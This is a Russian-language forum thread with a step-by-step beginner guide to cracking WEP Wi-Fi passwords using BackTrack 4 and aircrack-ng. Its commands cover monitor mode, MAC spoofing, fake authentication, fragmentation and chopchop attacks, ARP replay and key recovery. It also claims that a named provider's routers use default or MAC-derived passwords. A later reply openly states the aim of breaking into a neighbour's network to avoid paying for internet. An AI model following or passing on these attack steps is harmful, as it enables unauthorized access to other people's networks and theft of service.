![]() |
9 шагов или БТ4 взлом wep для начинающих!
Статейку накатал с опыта много чего не указал примеров нету и не нада - выложу видео ето будет проще
используем БТ4 , статья для тех кто не знает что такое линукс и ниразу с ним не работал не бойтесь пытаться юзать линукс все очень просто я уверен что у вас получиться , все остальные вопросы можна найти на форуме я уверен что там есть ответы. 1) airmon-ng start wifi0 Запускаем карту ( wlan0 -ето интерфейс он у каждого компа разный в даном случае wlan0) еще бывают ath0 mon0 итп. 2) airodump-ng wlan0 Запускаем мониторинг список сетей, выбираем мак сети и канал который будем ломать определиться с выбором можна просто смотрим какой сигнал сильнее логично , ето дело можна записывать но я просто командой выдиляем ето окно и жмем Ctrl+c - останавливает процес мониторинга , после выбора канала останавливаем все окна командой Ctrl+c и делаем такое airmon-ng stop mon0 airmon-ng stop wlan0 (внимание ето мой интерфейс у вас он может быть другим я выше писал) airmon-ng start wlan0 и канал сети которую будем ломать выглядит ето так airmon-ng start wlan0 9 - пример. 3) macchanger wlan0 смотрим свой мак адрес, визде по разному работает если у вас их 2 то первый ваш. В линуксе есть по стандарту 2 десктопа первые три выше указаных команды проделываем в одном десктопе а все остальное открываем 2 десктоп и проделываем все остальное ниже указаное ето для вашего удобства. 4) airodump-ng -c канал сети --bssid мак сети которую ломаем -w capture wlan0 запускаем монитор сети в етом окне будет мак ломаемой сети. И будут собираться пакеты. Пятая команда выполняеться в одном окне если все прошло нормально после пыполнения команд вы увидите англ текст и вот такое вот :-) 5) 1. aireplay-ng -1 0 -e (название сети которую ломаем) -a (мак сети которую ломаем) -h (ваш мак) wlan0 2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) wlan0 6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос жмем y 7) aireplay-ng -4 -h (ваш мак) -b (мак который ломаем) wlan0 атака отдельное окно будет задавать вопрос жмем y Если атака удалась то вы увидите файл .xor - его нада прописать ниже в первой команде 8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2. 2. aireplay-ng -2 -r arp-request wlan0 Команда 8 набираем в одном окне Ну вот и конец всему при наборе етой команды програма начнет переберать собраные пакеты их нада от 20 000 до 2000000 восновном весь процес в среднем занимает 15- 60 минут , если у вас не удалось запустить -4 -5 и -1 не растраивайтесь продолжайте собирать пакеты они форматом .cap сохраняються на ваш рабочий стол.. 9) aircrack-ng -b ломаемый мак capture*.cap Если пишет что KEY FOUND! - вы нашли пароль ... если в пароле будут все нули ето не верный пароль, продолжайте собирать пакеты до тех пор пока не найдете пароль ... взлом только шифрование wep Я думаю у вас получиться 8-)... БТ4 качаем с оф сайта большая скорость пол часа и скачали бесплатно. Более конкретно обсосать aircrack и airdump можна у Elvis000 на ветке .................................................. ................................... Что б не флудить решил сюда добавить по теме у кого провайдер PTv недавно просек тему у них у всех стоит wep 64 битный , пароль можна узнать очень просто 1. вариант admin логин и пароль 2. вариант МАК адрес ето и есть пароль только пропустите первые две цыфры а все остальное ето пароль , 5 точек проверил все работает ! :-) ... |
Отлично, жду видио.
|
bt4 предфинальная версия:
Шаг 1 останавливаем wi-fi карту: ifconfig wlan0 down шаг 2 меняем мак: macchanger --mac 00:11:11:11:11:11 wlan0 шаг 3 подымаем wi-fi карту: ifconfig wlan0 up шаг 3 включаем wi-fi карту в режим мониторинга: airmon-ng start wlan0 "получаем виртуальный интерфейс mon0" шаг 4 запускаем программу сканирования wi-fi сетей: airodump-ng mon0 шаг 5;6:7 и тд. читаем тему от Elvis000 "Документация по airodump-ng, aircrack-ng." там всё популярно написано. |
Цитата:
|
Цитата:
Цитата:
Цитата:
Цитата:
Спасибо за внимание, оформление статьи не сахар =( |
POS_troi
я видио выложу тады в ПМ писать не будут 8-) |
На пятом пункте постоянно:
Sending Authentication Request (Open System) Attack was unsuccessful. Possible reasons: * Perhaps MAC address filtering is enabled. * Check that the BSSID (-a option) is correct. * Try to change the number of packets (-o option). * The driver/card doesn't support injection. * This attack sometimes fails against some APs. * The card is not on the same channel as the AP. * You're too far from the AP. Get closer, or lower the transmit rate. ------------ все сломать эту точку уже не удастся, верно? |
LuCiFeR если это wep то получить пороль можно.
У вас может не хватает мощности вашей wi-fi карты или на AP стоит фильтрация по MAC, ещё попробуйте пройти Authentication когда на AP появится клиент. |
LuCiFeR у тя чипсет не centrino случайно ? если да то просто собирай пакеты , на 25000 можешь пробовать крякать если мало собирай до тех пор пока не напишет что пароль найден
|
У меня Асус М50Vc. я склоняюсь к тому варианту что сигнал слабоват.
Вообще я занимаюсь этим впервые, до этого никсы вообще не трогал. Но обстоятельства сложились так, что в этом месяце я не могу заплатить за свой инет, по этому ищу альтернативу в соседском вай фае))) http://img62.imageshack.us/img62/3482/snapshot1hm.png Кто нить тут видит приличную точку? ))) |
| Время: 09:53 |